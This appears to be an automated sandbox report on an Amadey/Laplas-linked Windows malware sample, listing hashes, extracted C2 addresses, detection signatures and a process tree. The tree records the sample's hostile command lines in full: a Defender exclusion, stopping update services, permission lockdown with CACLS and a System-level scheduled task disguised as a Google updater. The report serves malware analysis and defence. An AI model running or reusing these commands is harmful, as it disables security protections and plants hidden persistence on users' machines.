Analysis
-
max time kernel
227s -
max time network
303s -
platform
windows7_x64 -
resource
win7-20230712-en -
resource tags
arch:x64 arch:x86 image:win7-20230712-en locale:en-us os:windows7-x64 system -
submitted
26-07-2023 04:47
Behavioral task
behavioral1
Sample
1002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff.exe
Resource
win7-20230712-en
General
-
Target
1002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff.exe
-
Size
4.7MB
-
MD5
ede69e83b96e9bd7bbb4f4decd11e817
-
SHA1
1209597f9e6060b52a6e06ee95eec1c57257eeca
-
SHA256
1002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff
-
SHA512
8338b9240416577681baf3c49d7e9bfc27bd4a4b62f58b3142c032e0dcf7876a77769b946a88f45e55f6e5ac0bb7e29c66d9f812bec175baf65284457acda696
-
SSDEEP
98304:kX31mbIn5+7fqIKrwL/w4/0zDx+KTGT+C2ZHHUz+OBlMEuvl:kXl0o5afPD/F/0HkKTG+fniJ
Malware Config
Extracted
amadey
3.80
45.15.156.208/jd9dd3Vw/index.php
second.amadgood.com/jd9dd3Vw/index.php
Extracted
laplas
http://206.189.229.43
-
api_key
f52a5c9bc5eb2f51b22f04f3e85c301ac0170a650de6044773f0a8309fbdfb79
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
description | pid | Process | procid_target
PID 2992 created 1208 | 2992 | rdpcllp.exe | 13
PID 2992 created 1208 | 2992 | rdpcllp.exe | 13
PID 2992 created 1208 | 2992 | rdpcllp.exe | 13
PID 2992 created 1208 | 2992 | rdpcllp.exe | 13
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | taskhostclp.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | rdpcllp.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | ntlhost.exe
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description | ioc | Process
File created | C:\Windows\System32\drivers\etc\hosts | rdpcllp.exe
-
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 6 IoCs
BIOS information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rdpcllp.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | rdpcllp.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | ntlhost.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | ntlhost.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | taskhostclp.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | taskhostclp.exe
-
Executes dropped EXE 8 IoCs
pid | Process
2124 | oneetx.exe
1868 | oneetx.exe
2664 | oneetx.exe
896 | oneetx.exe
2172 | taskhostclp.exe
2992 | rdpcllp.exe
2956 | ntlhost.exe
2296 | oneetx.exe
-
Loads dropped DLL 4 IoCs
pid | Process
2336 | 1002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff.exe
2124 | oneetx.exe
2124 | oneetx.exe
2172 | taskhostclp.exe
-
Themida packer 11 IoCs
resource | yara_rule
behavioral1/files/0x0005000000018fb3-279.dat | themida
behavioral1/files/0x0005000000018fb3-286.dat | themida
behavioral1/files/0x0005000000018fb3-288.dat | themida
behavioral1/memory/2992-291-0x000000013FDD0000-0x0000000140D0D000-memory.dmp | themida
behavioral1/memory/2992-314-0x000000013FDD0000-0x0000000140D0D000-memory.dmp | themida
behavioral1/files/0x0005000000018fb3-409.dat | themida
behavioral1/memory/2992-413-0x000000013FDD0000-0x0000000140D0D000-memory.dmp | themida
behavioral1/files/0x0007000000018fcd-415.dat | themida
behavioral1/memory/2036-416-0x000000013F3B0000-0x00000001402ED000-memory.dmp | themida
behavioral1/files/0x0007000000018fcd-418.dat | themida
behavioral1/files/0x0007000000018fcd-456.dat | themida
-
VMProtect packed file 28 IoCs
resource | yara_rule
behavioral1/memory/2336-56-0x0000000000C30000-0x00000000013D9000-memory.dmp | vmprotect
behavioral1/memory/2336-59-0x0000000000C30000-0x00000000013D9000-memory.dmp | vmprotect
behavioral1/files/0x000b000000012298-94.dat | vmprotect
behavioral1/files/0x000b000000012298-95.dat | vmprotect
behavioral1/files/0x000b000000012298-96.dat | vmprotect
behavioral1/memory/2336-98-0x0000000000C30000-0x00000000013D9000-memory.dmp | vmprotect
behavioral1/memory/2124-101-0x0000000000C10000-0x00000000013B9000-memory.dmp | vmprotect
behavioral1/memory/2124-104-0x0000000000C10000-0x00000000013B9000-memory.dmp | vmprotect
behavioral1/files/0x000b000000012298-134.dat | vmprotect
behavioral1/memory/2124-147-0x0000000000C10000-0x00000000013B9000-memory.dmp | vmprotect
behavioral1/memory/2124-148-0x0000000000C10000-0x00000000013B9000-memory.dmp | vmprotect
behavioral1/files/0x000b000000012298-149.dat | vmprotect
behavioral1/memory/1868-152-0x0000000000C10000-0x00000000013B9000-memory.dmp | vmprotect
behavioral1/memory/1868-155-0x0000000000C10000-0x00000000013B9000-memory.dmp | vmprotect
behavioral1/memory/1868-185-0x0000000000C10000-0x00000000013B9000-memory.dmp | vmprotect
behavioral1/files/0x000b000000012298-186.dat | vmprotect
behavioral1/memory/2664-189-0x0000000000C10000-0x00000000013B9000-memory.dmp | vmprotect
behavioral1/memory/2664-192-0x0000000000C10000-0x00000000013B9000-memory.dmp | vmprotect
behavioral1/memory/2664-222-0x0000000000C10000-0x00000000013B9000-memory.dmp | vmprotect
behavioral1/files/0x000b000000012298-223.dat | vmprotect
behavioral1/memory/896-226-0x0000000000C10000-0x00000000013B9000-memory.dmp | vmprotect
behavioral1/memory/896-229-0x0000000000C10000-0x00000000013B9000-memory.dmp | vmprotect
behavioral1/memory/896-259-0x0000000000C10000-0x00000000013B9000-memory.dmp | vmprotect
behavioral1/files/0x000b000000012298-349.dat | vmprotect
behavioral1/memory/2296-365-0x0000000000C10000-0x00000000013B9000-memory.dmp | vmprotect
behavioral1/memory/2296-362-0x0000000000C10000-0x00000000013B9000-memory.dmp | vmprotect
behavioral1/memory/2296-400-0x0000000000C10000-0x00000000013B9000-memory.dmp | vmprotect
behavioral1/files/0x000b000000012298-463.dat | vmprotect
-
Adds Run key to start application 2 TTPs 1 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-722410544-1258951091-1992882075-1000\Software\Microsoft\Windows\CurrentVersion\Run\NTSystem = "C:\\Users\\Admin\\AppData\\Roaming\\NTSystem\\ntlhost.exe" | taskhostclp.exe
-
Checks whether UAC is enabled 3 IoCs
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | ntlhost.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | taskhostclp.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | rdpcllp.exe
-
Drops file in System32 directory 2 IoCs
description | ioc | Process
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
-
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
pid | Process
2172 | taskhostclp.exe
2992 | rdpcllp.exe
2956 | ntlhost.exe
-
Launches sc.exe 10 IoCs
Sc.exe is a Windows utility to control services on the system.
pid | Process
2544 | sc.exe
1988 | sc.exe
2056 | sc.exe
1672 | sc.exe
2508 | sc.exe
2272 | sc.exe
240 | sc.exe
1548 | sc.exe
1708 | sc.exe
2008 | sc.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
2632 | schtasks.exe
1704 | schtasks.exe
1156 | schtasks.exe
-
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description | flow | ioc
HTTP User-Agent header | 10 | Go-http-client/1.1
-
Suspicious behavior: EnumeratesProcesses 16 IoCs
pid | Process
2336 | 1002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff.exe
2124 | oneetx.exe
1868 | oneetx.exe
2664 | oneetx.exe
896 | oneetx.exe
2992 | rdpcllp.exe
2992 | rdpcllp.exe
2976 | powershell.exe
2992 | rdpcllp.exe
2992 | rdpcllp.exe
2296 | oneetx.exe
2992 | rdpcllp.exe
2992 | rdpcllp.exe
2992 | rdpcllp.exe
2992 | rdpcllp.exe
2660 | powershell.exe
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
description | pid | Process
Token: SeDebugPrivilege | 2976 | powershell.exe
Token: SeShutdownPrivilege | 1388 | powercfg.exe
Token: SeDebugPrivilege | 2660 | powershell.exe
Token: SeShutdownPrivilege | 1860 | powercfg.exe
-
Suspicious use of FindShellTrayWindow 1 IoCs
pid | Process
2336 | 1002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
description | pid | Process | procid_target
PID 2336 wrote to memory of 2124 | 2336 | 1002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff.exe | 28
PID 2336 wrote to memory of 2124 | 2336 | 1002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff.exe | 28
PID 2336 wrote to memory of 2124 | 2336 | 1002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff.exe | 28
PID 2336 wrote to memory of 2124 | 2336 | 1002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff.exe | 28
PID 2124 wrote to memory of 2632 | 2124 | oneetx.exe | 29
PID 2124 wrote to memory of 2632 | 2124 | oneetx.exe | 29
PID 2124 wrote to memory of 2632 | 2124 | oneetx.exe | 29
PID 2124 wrote to memory of 2632 | 2124 | oneetx.exe | 29
PID 2124 wrote to memory of 2432 | 2124 | oneetx.exe | 31
PID 2124 wrote to memory of 2432 | 2124 | oneetx.exe | 31
PID 2124 wrote to memory of 2432 | 2124 | oneetx.exe | 31
PID 2124 wrote to memory of 2432 | 2124 | oneetx.exe | 31
PID 2432 wrote to memory of 1384 | 2432 | cmd.exe | 33
PID 2432 wrote to memory of 1384 | 2432 | cmd.exe | 33
PID 2432 wrote to memory of 1384 | 2432 | cmd.exe | 33
PID 2432 wrote to memory of 1384 | 2432 | cmd.exe | 33
PID 2432 wrote to memory of 1636 | 2432 | cmd.exe | 34
PID 2432 wrote to memory of 1636 | 2432 | cmd.exe | 34
PID 2432 wrote to memory of 1636 | 2432 | cmd.exe | 34
PID 2432 wrote to memory of 1636 | 2432 | cmd.exe | 34
PID 2432 wrote to memory of 2596 | 2432 | cmd.exe | 35
PID 2432 wrote to memory of 2596 | 2432 | cmd.exe | 35
PID 2432 wrote to memory of 2596 | 2432 | cmd.exe | 35
PID 2432 wrote to memory of 2596 | 2432 | cmd.exe | 35
PID 2432 wrote to memory of 1828 | 2432 | cmd.exe | 36
PID 2432 wrote to memory of 1828 | 2432 | cmd.exe | 36
PID 2432 wrote to memory of 1828 | 2432 | cmd.exe | 36
PID 2432 wrote to memory of 1828 | 2432 | cmd.exe | 36
PID 2432 wrote to memory of 3036 | 2432 | cmd.exe | 37
PID 2432 wrote to memory of 3036 | 2432 | cmd.exe | 37
PID 2432 wrote to memory of 3036 | 2432 | cmd.exe | 37
PID 2432 wrote to memory of 3036 | 2432 | cmd.exe | 37
PID 2432 wrote to memory of 3040 | 2432 | cmd.exe | 38
PID 2432 wrote to memory of 3040 | 2432 | cmd.exe | 38
PID 2432 wrote to memory of 3040 | 2432 | cmd.exe | 38
PID 2432 wrote to memory of 3040 | 2432 | cmd.exe | 38
PID 1784 wrote to memory of 1868 | 1784 | taskeng.exe | 44
PID 1784 wrote to memory of 1868 | 1784 | taskeng.exe | 44
PID 1784 wrote to memory of 1868 | 1784 | taskeng.exe | 44
PID 1784 wrote to memory of 1868 | 1784 | taskeng.exe | 44
PID 1784 wrote to memory of 2664 | 1784 | taskeng.exe | 45
PID 1784 wrote to memory of 2664 | 1784 | taskeng.exe | 45
PID 1784 wrote to memory of 2664 | 1784 | taskeng.exe | 45
PID 1784 wrote to memory of 2664 | 1784 | taskeng.exe | 45
PID 1784 wrote to memory of 896 | 1784 | taskeng.exe | 46
PID 1784 wrote to memory of 896 | 1784 | taskeng.exe | 46
PID 1784 wrote to memory of 896 | 1784 | taskeng.exe | 46
PID 1784 wrote to memory of 896 | 1784 | taskeng.exe | 46
PID 2124 wrote to memory of 2172 | 2124 | oneetx.exe | 47
PID 2124 wrote to memory of 2172 | 2124 | oneetx.exe | 47
PID 2124 wrote to memory of 2172 | 2124 | oneetx.exe | 47
PID 2124 wrote to memory of 2172 | 2124 | oneetx.exe | 47
PID 2124 wrote to memory of 2992 | 2124 | oneetx.exe | 49
PID 2124 wrote to memory of 2992 | 2124 | oneetx.exe | 49
PID 2124 wrote to memory of 2992 | 2124 | oneetx.exe | 49
PID 2124 wrote to memory of 2992 | 2124 | oneetx.exe | 49
PID 2172 wrote to memory of 2956 | 2172 | taskhostclp.exe | 50
PID 2172 wrote to memory of 2956 | 2172 | taskhostclp.exe | 50
PID 2172 wrote to memory of 2956 | 2172 | taskhostclp.exe | 50
PID 1784 wrote to memory of 2296 | 1784 | taskeng.exe | 53
PID 1784 wrote to memory of 2296 | 1784 | taskeng.exe | 53
PID 1784 wrote to memory of 2296 | 1784 | taskeng.exe | 53
PID 1784 wrote to memory of 2296 | 1784 | taskeng.exe | 53
PID 2460 wrote to memory of 2544 | 2460 | cmd.exe | 56
Processes
-
Process tree (indentation shows parent/child depth; "cmdline" is the recorded command line, "-" lines are the signatures triggered by that process)

C:\Windows\Explorer.EXE (PID 1208)
  cmdline: C:\Windows\Explorer.EXE
  C:\Users\Admin\AppData\Local\Temp\1002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff.exe (PID 2336)
    cmdline: "C:\Users\Admin\AppData\Local\Temp\1002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff.exe"
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe (PID 2124)
      cmdline: "C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe"
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory
      C:\Windows\SysWOW64\schtasks.exe (PID 2632)
        cmdline: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe" /F
        - Creates scheduled task(s)
      C:\Windows\SysWOW64\cmd.exe (PID 2432)
        cmdline: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\eb0f58bce7" /P "Admin:N"&&CACLS "..\eb0f58bce7" /P "Admin:R" /E&&Exit
        - Suspicious use of WriteProcessMemory
        C:\Windows\SysWOW64\cmd.exe (PID 1384)
          cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        C:\Windows\SysWOW64\cacls.exe (PID 1636)
          cmdline: CACLS "oneetx.exe" /P "Admin:N"
        C:\Windows\SysWOW64\cacls.exe (PID 2596)
          cmdline: CACLS "oneetx.exe" /P "Admin:R" /E
        C:\Windows\SysWOW64\cmd.exe (PID 1828)
          cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        C:\Windows\SysWOW64\cacls.exe (PID 3036)
          cmdline: CACLS "..\eb0f58bce7" /P "Admin:N"
        C:\Windows\SysWOW64\cacls.exe (PID 3040)
          cmdline: CACLS "..\eb0f58bce7" /P "Admin:R" /E
      C:\Users\Admin\AppData\Local\Temp\1000125001\taskhostclp.exe (PID 2172)
        cmdline: "C:\Users\Admin\AppData\Local\Temp\1000125001\taskhostclp.exe"
        - Identifies VirtualBox via ACPI registry values (likely anti-VM)
        - Checks BIOS information in registry
        - Executes dropped EXE
        - Loads dropped DLL
        - Adds Run key to start application
        - Checks whether UAC is enabled
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Suspicious use of WriteProcessMemory
        C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe (PID 2956)
          cmdline: C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
          - Identifies VirtualBox via ACPI registry values (likely anti-VM)
          - Checks BIOS information in registry
          - Executes dropped EXE
          - Checks whether UAC is enabled
          - Suspicious use of NtSetInformationThreadHideFromDebugger
      C:\Users\Admin\AppData\Local\Temp\1000126101\rdpcllp.exe (PID 2992)
        cmdline: "C:\Users\Admin\AppData\Local\Temp\1000126101\rdpcllp.exe"
        - Suspicious use of NtCreateUserProcessOtherParentProcess
        - Identifies VirtualBox via ACPI registry values (likely anti-VM)
        - Drops file in Drivers directory
        - Checks BIOS information in registry
        - Executes dropped EXE
        - Checks whether UAC is enabled
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Suspicious behavior: EnumeratesProcesses
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2976)
    cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\System32\cmd.exe (PID 2460)
    cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
    - Suspicious use of WriteProcessMemory
    C:\Windows\System32\sc.exe (PID 2544)
      cmdline: sc stop UsoSvc
      - Launches sc.exe
    C:\Windows\System32\sc.exe (PID 2272)
      cmdline: sc stop WaaSMedicSvc
      - Launches sc.exe
    C:\Windows\System32\sc.exe (PID 1988)
      cmdline: sc stop wuauserv
      - Launches sc.exe
    C:\Windows\System32\sc.exe (PID 240)
      cmdline: sc stop bits
      - Launches sc.exe
    C:\Windows\System32\sc.exe (PID 2056)
      cmdline: sc stop dosvc
      - Launches sc.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2660)
    cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fyhjjuwy#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\schtasks.exe (PID 1704)
      cmdline: "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
      - Creates scheduled task(s)
  C:\Windows\System32\cmd.exe (PID 1048)
    cmdline: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    C:\Windows\System32\powercfg.exe (PID 1388)
      cmdline: powercfg /x -hibernate-timeout-ac 0
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\System32\powercfg.exe (PID 1860)
      cmdline: powercfg /x -hibernate-timeout-dc 0
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\System32\powercfg.exe (PID 812)
      cmdline: powercfg /x -standby-timeout-ac 0
    C:\Windows\System32\powercfg.exe (PID 828)
      cmdline: powercfg /x -standby-timeout-dc 0
  C:\Windows\System32\schtasks.exe (PID 2540)
    cmdline: C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 936)
    cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  C:\Windows\System32\cmd.exe (PID 1916)
    cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
    C:\Windows\System32\sc.exe (PID 1672)
      cmdline: sc stop UsoSvc
      - Launches sc.exe
    C:\Windows\System32\sc.exe (PID 1548)
      cmdline: sc stop WaaSMedicSvc
      - Launches sc.exe
    C:\Windows\System32\sc.exe (PID 1708)
      cmdline: sc stop wuauserv
      - Launches sc.exe
    C:\Windows\System32\sc.exe (PID 2008)
      cmdline: sc stop bits
      - Launches sc.exe
    C:\Windows\System32\sc.exe (PID 2508)
      cmdline: sc stop dosvc
      - Launches sc.exe
  C:\Windows\System32\cmd.exe (PID 904)
    cmdline: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    C:\Windows\System32\powercfg.exe (PID 2404)
      cmdline: powercfg /x -hibernate-timeout-ac 0
    C:\Windows\System32\powercfg.exe (PID 2216)
      cmdline: powercfg /x -hibernate-timeout-dc 0
    C:\Windows\System32\powercfg.exe (PID 2576)
      cmdline: powercfg /x -standby-timeout-ac 0
    C:\Windows\System32\powercfg.exe (PID 1940)
      cmdline: powercfg /x -standby-timeout-dc 0
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2440)
    cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fyhjjuwy#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
    C:\Windows\system32\schtasks.exe (PID 1156)
      cmdline: "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
      - Creates scheduled task(s)
  C:\Windows\System32\conhost.exe (PID 1684)
    cmdline: C:\Windows\System32\conhost.exe
  C:\Windows\explorer.exe (PID 2192)
    cmdline: C:\Windows\explorer.exe

C:\Windows\system32\taskeng.exe (PID 1784)
  cmdline: taskeng.exe {C1D7B51C-4B78-4920-816D-9A84B64D2D03} S-1-5-21-722410544-1258951091-1992882075-1000:MGKTNXNO\Admin:Interactive:[1]
  - Suspicious use of WriteProcessMemory
  C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe (PID 1868)
    cmdline: C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
  C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe (PID 2664)
    cmdline: C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
  C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe (PID 896)
    cmdline: C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
  C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe (PID 2296)
    cmdline: C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
  C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe (PID 2924)
    cmdline: C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

C:\Windows\system32\taskeng.exe (PID 2036)
  cmdline: taskeng.exe {B107125E-6E02-41D5-8259-F2006115F2D8} S-1-5-18:NT AUTHORITY\System:Service:
  C:\Program Files\Google\Chrome\updater.exe (PID 436)
    cmdline: "C:\Program Files\Google\Chrome\updater.exe"
-
Network
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution 1
- Registry Run Keys / Startup Folder 1
- Create or Modify System Process 1
- Windows Service 1
- Scheduled Task/Job 1
Privilege Escalation
- Boot or Logon Autostart Execution 1
- Registry Run Keys / Startup Folder 1
- Create or Modify System Process 1
- Windows Service 1
- Scheduled Task/Job 1
Downloads